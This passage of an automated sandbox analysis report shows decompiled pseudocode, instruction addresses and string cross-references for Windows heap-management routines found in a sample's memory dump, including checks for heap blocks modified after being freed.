										_t216 =  *((intOrPtr*)(_t255 + 4)) - 1;
										__eflags = _t216;
										goto L28;
									}
									_t255 = _t182;
									if(_t216 >=  *((intOrPtr*)(_t255 + 4))) {
										continue;
									} else {
										goto L28;
									}
								}
								goto L28;
							}
						}
					}
					L39:
				} while (_t235 != 0);
				_t214 = _v12;
				_t131 =  *(_t206 + 0x54) ^ _t214;
				 *(_t256 + 4) = _t131;
				if(_t214 == 0) {
					__eflags =  *0xa88748 - 1;
					if( *0xa88748 >= 1) {
						_t127 = _t256 + 0xfff; // 0xfff
						_t131 = _t127 & 0xfffff000;
						__eflags = _t131 - _t256;
						if(_t131 != _t256) {
							_t156 =  *[fs:0x30];
							__eflags =  *(_t156 + 0xc);
							if( *(_t156 + 0xc) == 0) {
								_push("HEAP: ");
								E0099B150();
							} else {
								E0099B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
							_t131 = E0099B150();
							__eflags =  *0xa87bc8;
							if(__eflags == 0) {
								_t131 = E00A52073(_t206, 1, _t251, __eflags);
							}
						}
					}
				}
				goto L41;
			}























































                                                                                                                0x009ba83a
                                                                                                                0x009ba83c
                                                                                                                0x009ba83e
                                                                                                                0x009ba841
                                                                                                                0x009ba844
                                                                                                                0x009ba84a
                                                                                                                0x009baa53
                                                                                                                0x009baa59
                                                                                                                0x009baa59
                                                                                                                0x009ba858
                                                                                                                0x009ba85e
                                                                                                                0x009baaf5
                                                                                                                0x009baafc
                                                                                                                0x00a0229e
                                                                                                                0x00a022a2
                                                                                                                0x00a022a8
                                                                                                                0x00a022b3
                                                                                                                0x00a022b5
                                                                                                                0x00a022bb
                                                                                                                0x00a022c1
                                                                                                                0x00a022c5
                                                                                                                0x00a022e6
                                                                                                                0x00a022eb
                                                                                                                0x00a022f0
                                                                                                                0x00a022c7
                                                                                                                0x00a022dc
                                                                                                                0x00a022e1
                                                                                                                0x00a022e1
                                                                                                                0x00a022f3
                                                                                                                0x00a022f8
                                                                                                                0x00a022fd
                                                                                                                0x00a02300
                                                                                                                0x00a02307
                                                                                                                0x00a0230e
                                                                                                                0x00a0230e
                                                                                                                0x00a02313
                                                                                                                0x00a02313
                                                                                                                0x00a022b5
                                                                                                                0x00a022a2
                                                                                                                0x009baafc
                                                                                                                0x009ba864
                                                                                                                0x009ba869
                                                                                                                0x009baa5c
                                                                                                                0x009baa5e
                                                                                                                0x009ba86f
                                                                                                                0x009ba87f
                                                                                                                0x009ba885
                                                                                                                0x009ba885
                                                                                                                0x009ba88b
                                                                                                                0x009ba890
                                                                                                                0x009ba896
                                                                                                                0x009bab0c
                                                                                                                0x009bab0f
                                                                                                                0x009bab15
                                                                                                                0x00a02320
                                                                                                                0x00a02320
                                                                                                                0x009bab1b
                                                                                                                0x009ba89c
                                                                                                                0x009ba89f
                                                                                                                0x009ba8a2
                                                                                                                0x009ba8a2
                                                                                                                0x009ba8a5
                                                                                                                0x009ba8af
                                                                                                                0x009ba8b3
                                                                                                                0x009ba8b8
                                                                                                                0x009baa66
                                                                                                                0x009ba8be
                                                                                                                0x009ba8c5
                                                                                                                0x009ba8c6
                                                                                                                0x009ba8ce
                                                                                                                0x00a02328
                                                                                                                0x00a02332
                                                                                                                0x00a02337
                                                                                                                0x00a02337
                                                                                                                0x009ba8ce
                                                                                                                0x009ba8d4
                                                                                                                0x009ba8d8
                                                                                                                0x009ba8db
                                                                                                                0x009ba8de
                                                                                                                0x009ba8e1
                                                                                                                0x009ba8e5
                                                                                                                0x009ba8e8
                                                                                                                0x009ba8f0
                                                                                                                0x009ba8f3
                                                                                                                0x00a0234c
                                                                                                                0x00a02350
                                                                                                                0x00a02355
                                                                                                                0x00a02359
                                                                                                                0x00a02359
                                                                                                                0x009ba8f9
                                                                                                                0x009ba901
                                                                                                                0x009baae4
                                                                                                                0x009baae4
                                                                                                                0x009baaea
                                                                                                                0x00000000
                                                                                                                0x009ba907
                                                                                                                0x009ba90a
                                                                                                                0x009ba91d
                                                                                                                0x009ba91d
                                                                                                                0x00000000
                                                                                                                0x009ba910
                                                                                                                0x009ba910
                                                                                                                0x009ba910
                                                                                                                0x009ba914
                                                                                                                0x009ba924
                                                                                                                0x009ba924
                                                                                                                0x009ba924
                                                                                                                0x009ba924
                                                                                                                0x009ba916
                                                                                                                0x009ba91b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x009ba91b
                                                                                                                0x009ba925
                                                                                                                0x009ba925
                                                                                                                0x009ba932
                                                                                                                0x009ba936
                                                                                                                0x009ba93c
                                                                                                                0x009ba93c
                                                                                                                0x009ba93c
                                                                                                                0x009bab22
                                                                                                                0x009bab24
                                                                                                                0x009bab27
                                                                                                                0x009bab27
                                                                                                                0x009ba942
                                                                                                                0x009ba944
                                                                                                                0x009baaba
                                                                                                                0x009baabd
                                                                                                                0x009baac0
                                                                                                                0x009baac0
                                                                                                                0x009baac2
                                                                                                                0x009bab2f
                                                                                                                0x009baac4
                                                                                                                0x009baac4
                                                                                                                0x009baac7
                                                                                                                0x009baaca
                                                                                                                0x009baacc
                                                                                                                0x009baace
                                                                                                                0x009baace
                                                                                                                0x009baace
                                                                                                                0x009baad1
                                                                                                                0x009baad1
                                                                                                                0x009baad7
                                                                                                                0x009baad9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00a02361
                                                                                                                0x00a02369
                                                                                                                0x00a0236b
                                                                                                                0x00000000
                                                                                                                0x00a02371
                                                                                                                0x00000000
                                                                                                                0x00a02371
                                                                                                                0x00000000
                                                                                                                0x00a0236b
                                                                                                                0x009baac0
                                                                                                                0x009ba94a
                                                                                                                0x009ba94a
                                                                                                                0x009ba94d
                                                                                                                0x009ba94d
                                                                                                                0x009ba950
                                                                                                                0x009ba954
                                                                                                                0x00a02376
                                                                                                                0x00a02380
                                                                                                                0x009ba95a
                                                                                                                0x009ba95a
                                                                                                                0x009ba95c
                                                                                                                0x009ba95f
                                                                                                                0x009ba961
                                                                                                                0x009ba961
                                                                                                                0x009ba967
                                                                                                                0x009ba96a
                                                                                                                0x009ba972
                                                                                                                0x009baa02
                                                                                                                0x009baa06
                                                                                                                0x009baa10
                                                                                                                0x009baa16
                                                                                                                0x009baa16
                                                                                                                0x009baa1b
                                                                                                                0x009baa21
                                                                                                                0x009baa24
                                                                                                                0x009baa27
                                                                                                                0x009baa29
                                                                                                                0x009baa2c
                                                                                                                0x009baa32
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x009ba978
                                                                                                                0x009ba978
                                                                                                                0x009ba97b
                                                                                                                0x009ba981
                                                                                                                0x009ba996
                                                                                                                0x009ba998
                                                                                                                0x009ba99f
                                                                                                                0x009ba9a2
                                                                                                                0x00a0238a
                                                                                                                0x009ba9a8
                                                                                                                0x009ba9a8
                                                                                                                0x009ba9a8
                                                                                                                0x009ba9aa
                                                                                                                0x009ba9ad
                                                                                                                0x009ba9b0
                                                                                                                0x009ba9bb
                                                                                                                0x009ba9be
                                                                                                                0x009ba9c7
                                                                                                                0x009ba9c9
                                                                                                                0x009ba9c9
                                                                                                                0x009ba9cc
                                                                                                                0x009ba9d1
                                                                                                                0x009baa6d
                                                                                                                0x009baa70
                                                                                                                0x009baa73
                                                                                                                0x009baa75
                                                                                                                0x009baa79
                                                                                                                0x009baa7e
                                                                                                                0x009baa82
                                                                                                                0x009baa8f
                                                                                                                0x009baa94
                                                                                                                0x009baa96
                                                                                                                0x00a02392
                                                                                                                0x00a023a1
                                                                                                                0x00a023a1
                                                                                                                0x009baa9c
                                                                                                                0x009baa9f
                                                                                                                0x009baaa2
                                                                                                                0x009baaa2
                                                                                                                0x009baaa8
                                                                                                                0x009baaab
                                                                                                                0x009baaaf
                                                                                                                0x00000000
                                                                                                                0x009baab5
                                                                                                                0x00000000
                                                                                                                0x009baab5
                                                                                                                0x009ba9d7
                                                                                                                0x009ba9d7
                                                                                                                0x009ba9da
                                                                                                                0x009ba9e0
                                                                                                                0x009ba9e3
                                                                                                                0x009ba9e6
                                                                                                                0x009ba9e9
                                                                                                                0x009ba9eb
                                                                                                                0x009ba9fd
                                                                                                                0x009ba9fd
                                                                                                                0x00000000
                                                                                                                0x009ba9eb
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x009ba983
                                                                                                                0x009ba983
                                                                                                                0x009ba983
                                                                                                                0x009ba987
                                                                                                                0x009ba995
                                                                                                                0x009ba995
                                                                                                                0x009ba995
                                                                                                                0x009ba995
                                                                                                                0x009ba989
                                                                                                                0x009ba98e
                                                                                                                0x00000000
                                                                                                                0x009ba990
                                                                                                                0x00000000
                                                                                                                0x009ba990
                                                                                                                0x009ba98e
                                                                                                                0x00000000
                                                                                                                0x009ba983
                                                                                                                0x009ba972
                                                                                                                0x009ba90a
                                                                                                                0x009baa34
                                                                                                                0x009baa34
                                                                                                                0x009baa40
                                                                                                                0x009baa43
                                                                                                                0x009baa46
                                                                                                                0x009baa4d
                                                                                                                0x00a023ab
                                                                                                                0x00a023b2
                                                                                                                0x00a023b8
                                                                                                                0x00a023be
                                                                                                                0x00a023c3
                                                                                                                0x00a023c5
                                                                                                                0x00a023cb
                                                                                                                0x00a023d1
                                                                                                                0x00a023d5
                                                                                                                0x00a023f6
                                                                                                                0x00a023fb
                                                                                                                0x00a023d7
                                                                                                                0x00a023ec
                                                                                                                0x00a023f1
                                                                                                                0x00a02403
                                                                                                                0x00a02408
                                                                                                                0x00a02410
                                                                                                                0x00a02417
                                                                                                                0x00a02422
                                                                                                                0x00a02422
                                                                                                                0x00a02417
                                                                                                                0x00a023c5
                                                                                                                0x00a023b2
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 00A02403
                                                                                                                • HEAP[%wZ]: , xrefs: 00A022D7, 00A023E7
                                                                                                                • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 00A022F3
                                                                                                                • HEAP: , xrefs: 00A022E6, 00A023F6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                                                                • API String ID: 0-1657114761
                                                                                                                • Opcode ID: 32d2a8b8526db947c21f00745273b037bfb156d33a54712de07c890ea35d3032
                                                                                                                • Instruction ID: c5466ffc30e11911321c11857dde3f5d6253534923ba38af16803b020b959780
                                                                                                                • Opcode Fuzzy Hash: 32d2a8b8526db947c21f00745273b037bfb156d33a54712de07c890ea35d3032
                                                                                                                • Instruction Fuzzy Hash: B0D1E4306002459FDB18CF68C694BBAB7F6FF48310F248569D85A9B781E734EC45DB62
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009BA229, Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 69%
                                                                                                                			E009BA229(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				char _v28;
				void* _v44;
				void* _v48;
				void* _v56;
				void* _v60;
				void* __ebx;
				signed int _t55;
				signed int _t57;
				void* _t61;
				intOrPtr _t62;
				void* _t65;
				void* _t71;
				signed char* _t74;
				intOrPtr _t75;
				signed char* _t80;
				intOrPtr _t81;
				void* _t82;
				signed char* _t85;
				signed char _t91;
				void* _t103;
				void* _t105;
				void* _t121;
				void* _t129;
				signed int _t131;
				void* _t133;

				_t105 = __ecx;
				_t133 = (_t131 & 0xfffffff8) - 0x1c;
				_t103 = __edx;
				_t129 = __ecx;
				L009BDF24(__edx,  &_v28, _t133);
				_t55 =  *(_t129 + 0x40) & 0x00040000;
				asm("sbb edi, edi");
				_t121 = ( ~_t55 & 0x0000003c) + 4;
				if(_t55 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t129);
					_push(0xffffffff);
					_t57 = E009D9730();
					__eflags = _t57;
					if(_t57 < 0) {
						L17:
						_push(_t105);
						E00A5A80D(_t129, 1, _v20, 0);
						_t121 = 4;
						goto L1;
					}
					__eflags = _v20 & 0x00000060;
					if((_v20 & 0x00000060) == 0) {
						goto L17;
					}
					__eflags = _v24 - _t129;
					if(_v24 == _t129) {
						goto L1;
					}
					goto L17;
				}
				L1:
				_push(_t121);
				_push(0x1000);
				_push(_t133 + 0x14);
				_push(0);
				_push(_t133 + 0x20);
				_push(0xffffffff);
				_t61 = E009D9660();
				_t122 = _t61;
				if(_t61 < 0) {
					_t62 =  *[fs:0x30];
					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
					__eflags =  *(_t62 + 0xc);
					if( *(_t62 + 0xc) == 0) {
						_push("HEAP: ");
						E0099B150();
					} else {
						E0099B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *((intOrPtr*)(_t133 + 0xc)));
					_push( *((intOrPtr*)(_t133 + 0x14)));
					_push(_t129);
					E0099B150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
					_t65 = 0;
					L13:
					return _t65;
				}
				_t71 = E009B7D50();
				_t124 = 0x7ffe0380;
				if(_t71 != 0) {
					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t74 = 0x7ffe0380;
				}
				if( *_t74 != 0) {
					_t75 =  *[fs:0x30];
					__eflags =  *(_t75 + 0x240) & 0x00000001;
					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
						E00A5138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
					}
				}
				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
				if(E009B7D50() != 0) {
					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t80 = _t124;
				}
				if( *_t80 != 0) {
					_t81 =  *[fs:0x30];
					__eflags =  *(_t81 + 0x240) & 0x00000001;
					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
						__eflags = E009B7D50();
						if(__eflags != 0) {
							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						E00A51582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
					}
				}
				_t82 = E009B7D50();
				_t125 = 0x7ffe038a;
				if(_t82 != 0) {
					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
				} else {
					_t85 = 0x7ffe038a;
				}
				if( *_t85 != 0) {
					__eflags = E009B7D50();
					if(__eflags != 0) {
						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
					}
					E00A51582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
				}
				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
				_t91 =  *(_t103 + 2);
				if((_t91 & 0x00000004) != 0) {
					E009ED5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
					_t91 =  *(_t103 + 2);
				}
				 *(_t103 + 2) = _t91 & 0x00000017;
				_t65 = 1;
				goto L13;
			}






























                                                                                                                0x009ba229
                                                                                                                0x009ba231
                                                                                                                0x009ba23f
                                                                                                                0x009ba242
                                                                                                                0x009ba244
                                                                                                                0x009ba24c
                                                                                                                0x009ba255
                                                                                                                0x009ba25a
                                                                                                                0x009ba25f
                                                                                                                0x00a01c76
                                                                                                                0x00a01c78
                                                                                                                0x00a01c7e
                                                                                                                0x00a01c7f
                                                                                                                0x00a01c81
                                                                                                                0x00a01c82
                                                                                                                0x00a01c84
                                                                                                                0x00a01c89
                                                                                                                0x00a01c8b
                                                                                                                0x00a01c9e
                                                                                                                0x00a01c9e
                                                                                                                0x00a01cab
                                                                                                                0x00a01cb2
                                                                                                                0x00000000
                                                                                                                0x00a01cb2
                                                                                                                0x00a01c8d
                                                                                                                0x00a01c92
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00a01c94
                                                                                                                0x00a01c98
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00a01c98
                                                                                                                0x009ba265
                                                                                                                0x009ba265
                                                                                                                0x009ba266
                                                                                                                0x009ba26f
                                                                                                                0x009ba270
                                                                                                                0x009ba276
                                                                                                                0x009ba277
                                                                                                                0x009ba279
                                                                                                                0x009ba27e
                                                                                                                0x009ba282
                                                                                                                0x00a01db5
                                                                                                                0x00a01dbb
                                                                                                                0x00a01dc1
                                                                                                                0x00a01dc5
                                                                                                                0x00a01de4
                                                                                                                0x00a01de9
                                                                                                                0x00a01dc7
                                                                                                                0x00a01ddc
                                                                                                                0x00a01de1
                                                                                                                0x00a01def
                                                                                                                0x00a01df3
                                                                                                                0x00a01df7
                                                                                                                0x00a01dfe
                                                                                                                0x00a01e06
                                                                                                                0x009ba302
                                                                                                                0x009ba308
                                                                                                                0x009ba308
                                                                                                                0x009ba288
                                                                                                                0x009ba28d
                                                                                                                0x009ba294
                                                                                                                0x00a01cc1
                                                                                                                0x009ba29a
                                                                                                                0x009ba29a
                                                                                                                0x009ba29a
                                                                                                                0x009ba29f
                                                                                                                0x00a01ccb
                                                                                                                0x00a01cd1
                                                                                                                0x00a01cd8
                                                                                                                0x00a01cea
                                                                                                                0x00a01cea
                                                                                                                0x00a01cd8
                                                                                                                0x009ba2a9
                                                                                                                0x009ba2af
                                                                                                                0x009ba2bc
                                                                                                                0x00a01cfd
                                                                                                                0x009ba2c2
                                                                                                                0x009ba2c2
                                                                                                                0x009ba2c2
                                                                                                                0x009ba2c7
                                                                                                                0x00a01d07
                                                                                                                0x00a01d0d
                                                                                                                0x00a01d14
                                                                                                                0x00a01d1f
                                                                                                                0x00a01d21
                                                                                                                0x00a01d2c
                                                                                                                0x00a01d2c
                                                                                                                0x00a01d2c
                                                                                                                0x00a01d47
                                                                                                                0x00a01d47
                                                                                                                0x00a01d14
                                                                                                                0x009ba2cd
                                                                                                                0x009ba2d2
                                                                                                                0x009ba2d9
                                                                                                                0x00a01d5a
                                                                                                                0x009ba2df
                                                                                                                0x009ba2df
                                                                                                                0x009ba2df
                                                                                                                0x009ba2e4
                                                                                                                0x00a01d69
                                                                                                                0x00a01d6b
                                                                                                                0x00a01d76
                                                                                                                0x00a01d76
                                                                                                                0x00a01d76
                                                                                                                0x00a01d91
                                                                                                                0x00a01d91
                                                                                                                0x009ba2ea
                                                                                                                0x009ba2f0
                                                                                                                0x009ba2f5
                                                                                                                0x00a01da8
                                                                                                                0x00a01dad
                                                                                                                0x00a01dad
                                                                                                                0x009ba2fd
                                                                                                                0x009ba300
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                                                • API String ID: 2994545307-2586055223
                                                                                                                • Opcode ID: ada7329353c5b7b7ea4609a700ef6af9e13f47222d471b558e3d7a4832796e08
                                                                                                                • Instruction ID: e0bbe37955bcb2f37ac3a476199d15287421c9adc222220fd2dc276159a57c6a
                                                                                                                • Opcode Fuzzy Hash: ada7329353c5b7b7ea4609a700ef6af9e13f47222d471b558e3d7a4832796e08
                                                                                                                • Instruction Fuzzy Hash: 9C51E3322056849FE722DB68D945FA777E8FFC0B60F140964F8658B2D2D778D904CB62
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00A549A4, Relevance: 5.1, Strings: 4, Instructions: 114COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                                                                • API String ID: 2994545307-336120773
                                                                                                                • Opcode ID: 9f562df35141da67c55a859894d90a89b9fe5ec8fbd39415500a8323aa9ec577
                                                                                                                • Instruction ID: 24bb8f3de775fe7c3f0fde55892fd21e57f0d40e7d7a6a131779faaa2d39d05d
                                                                                                                • Opcode Fuzzy Hash: 9f562df35141da67c55a859894d90a89b9fe5ec8fbd39415500a8323aa9ec577
                                                                                                                • Instruction Fuzzy Hash: 99310532184100EFC761DB9CC886F6773A8FF49BA9F144055F9099B2A2E774EC84CB58
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009B99BF, Relevance: 4.3, Strings: 3, Instructions: 572COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 78%
                                                                                                                			E009B99BF(void* __ecx, signed short* __edx, signed int* _a4, signed int _a8) {
				char _v5;
				signed int _v12;
				signed int _v16;
				signed short _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed short _t186;
				intOrPtr _t187;
				signed short _t190;
				signed int _t196;
				signed short _t197;
				intOrPtr _t203;
				signed int _t207;
				signed int _t210;
				signed short _t215;
				intOrPtr _t216;
				signed short _t219;
				signed int _t221;
				signed short _t222;
				intOrPtr _t228;
				signed int _t232;
				signed int _t235;
				signed int _t250;
				signed short _t251;
				intOrPtr _t252;
				signed short _t254;
				intOrPtr _t255;
				signed int _t258;
				signed int _t259;
				signed short _t262;
				intOrPtr _t271;
				signed int _t279;
				signed int _t282;
				signed int _t284;
				signed int _t286;
				intOrPtr _t292;
				signed int _t296;
				signed int _t299;
				void* _t307;
				signed int* _t309;
				signed short* _t311;
				signed short* _t313;
				signed char _t314;
				intOrPtr _t316;
				signed int _t323;
				signed char _t328;
				signed short* _t330;
				signed char _t331;
				intOrPtr _t335;
				signed int _t342;
				signed char _t347;
				signed short* _t348;
				signed short* _t350;
				signed short _t352;
				signed char _t354;
				intOrPtr _t357;
				intOrPtr* _t364;
				signed char _t365;
				intOrPtr _t366;
				signed int _t373;
				signed char _t378;
				signed int* _t381;
				signed int _t382;
				signed short _t384;
				signed int _t386;
				unsigned int _t390;
				signed int _t393;
				signed int* _t394;
				unsigned int _t398;
				signed short _t400;
				signed short _t402;
				signed int _t404;
				signed int _t407;
				unsigned int _t411;
				signed short* _t414;
				signed int _t415;
				signed short* _t419;
				signed int* _t420;
				void* _t421;

				_t414 = __edx;
				_t307 = __ecx;
				_t419 = __edx - (( *(__edx + 4) & 0x0000ffff ^  *(__ecx + 0x54) & 0x0000ffff) << 3);
				if(_t419 == __edx || (( *(__ecx + 0x4c) >> 0x00000014 &  *(__ecx + 0x52) ^ _t419[1]) & 0x00000001) != 0) {
					_v5 = _a8;
					L3:
					_t381 = _a4;
					goto L4;
				} else {
					__eflags =  *(__ecx + 0x4c);
					if( *(__ecx + 0x4c) != 0) {
						_t411 =  *(__ecx + 0x50) ^  *_t419;
						 *_t419 = _t411;
						_t378 = _t411 >> 0x00000010 ^ _t411 >> 0x00000008 ^ _t411;
						__eflags = _t411 >> 0x18 - _t378;
						if(__eflags != 0) {
							_push(_t378);
							E00A4FA2B(__ecx, __ecx, _t419, __edx, _t419, __eflags);
						}
					}
					_t250 = _a8;
					_v5 = _t250;
					__eflags = _t250;
					if(_t250 != 0) {
						_t400 = _t414[6];
						_t53 =  &(_t414[4]); // -16
						_t348 = _t53;
						_t251 =  *_t348;
						_v12 = _t251;
						_v16 = _t400;
						_t252 =  *((intOrPtr*)(_t251 + 4));
						__eflags =  *_t400 - _t252;
						if( *_t400 != _t252) {
							L49:
							_push(_t348);
							_push( *_t400);
							E00A5A80D(_t307, 0xd, _t348, _t252);
							L50:
							_v5 = 0;
							goto L11;
						}
						__eflags =  *_t400 - _t348;
						if( *_t400 != _t348) {
							goto L49;
						}
						 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
						_t407 =  *(_t307 + 0xb4);
						__eflags = _t407;
						if(_t407 == 0) {
							L36:
							_t364 = _v16;
							_t282 = _v12;
							 *_t364 = _t282;
							 *((intOrPtr*)(_t282 + 4)) = _t364;
							__eflags = _t414[1] & 0x00000008;
							if((_t414[1] & 0x00000008) == 0) {
								L39:
								_t365 = _t414[1];
								__eflags = _t365 & 0x00000004;
								if((_t365 & 0x00000004) != 0) {
									_t284 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
									_v12 = _t284;
									__eflags = _t365 & 0x00000002;
									if((_t365 & 0x00000002) != 0) {
										__eflags = _t284 - 4;
										if(_t284 > 4) {
											_t284 = _t284 - 4;
											__eflags = _t284;
											_v12 = _t284;
										}
									}
									_t78 =  &(_t414[8]); // -8
									_t286 = E009ED540(_t78, _t284, 0xfeeefeee);
									_v16 = _t286;
									__eflags = _t286 - _v12;
									if(_t286 != _v12) {
										_t366 =  *[fs:0x30];
										__eflags =  *(_t366 + 0xc);
										if( *(_t366 + 0xc) == 0) {
											_push("HEAP: ");
											E0099B150();
										} else {
											E0099B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_v16 + 0x10 + _t414);
										E0099B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
										_t292 =  *[fs:0x30];
										_t421 = _t421 + 0xc;
										__eflags =  *((char*)(_t292 + 2));
										if( *((char*)(_t292 + 2)) != 0) {
											 *0xa86378 = 1;
											asm("int3");
											 *0xa86378 = 0;
										}
									}
								}
								goto L50;
							}
							_t296 = E009BA229(_t307, _t414);
							__eflags = _t296;
							if(_t296 != 0) {
								goto L39;
							} else {
								L009BA309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
								goto L50;
							}
						} else {
							_t373 =  *_t414 & 0x0000ffff;
							while(1) {
								__eflags = _t373 -  *((intOrPtr*)(_t407 + 4));
								if(_t373 <  *((intOrPtr*)(_t407 + 4))) {
									_t301 = _t373;
									break;
								}
								_t299 =  *_t407;
								__eflags = _t299;
								if(_t299 == 0) {
									_t301 =  *((intOrPtr*)(_t407 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t407 + 4)) - 1;
									break;
								} else {
									_t407 = _t299;
									continue;
								}
							}
							_t62 =  &(_t414[4]); // -16
							E009BBC04(_t307, _t407, 1, _t62, _t301, _t373);
							goto L36;
						}
					}
					L11:
					_t402 = _t419[6];
					_t25 =  &(_t419[4]); // -16
					_t350 = _t25;
					_t254 =  *_t350;
					_v12 = _t254;
					_v20 = _t402;
					_t255 =  *((intOrPtr*)(_t254 + 4));
					__eflags =  *_t402 - _t255;
					if( *_t402 != _t255) {
						L61:
						_push(_t350);
						_push( *_t402);
						E00A5A80D(_t307, 0xd, _t350, _t255);
						goto L3;
					}
					__eflags =  *_t402 - _t350;
					if( *_t402 != _t350) {
						goto L61;
					}
					 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t419 & 0x0000ffff);
					_t404 =  *(_t307 + 0xb4);
					__eflags = _t404;
					if(_t404 == 0) {
						L20:
						_t352 = _v20;
						_t258 = _v12;
						 *_t352 = _t258;
						 *(_t258 + 4) = _t352;
						__eflags = _t419[1] & 0x00000008;
						if((_t419[1] & 0x00000008) != 0) {
							_t259 = E009BA229(_t307, _t419);
							__eflags = _t259;
							if(_t259 != 0) {
								goto L21;
							} else {
								L009BA309(_t307, _t419,  *_t419 & 0x0000ffff, 1);
								goto L3;
							}
						}
						L21:
						_t354 = _t419[1];
						__eflags = _t354 & 0x00000004;
						if((_t354 & 0x00000004) != 0) {
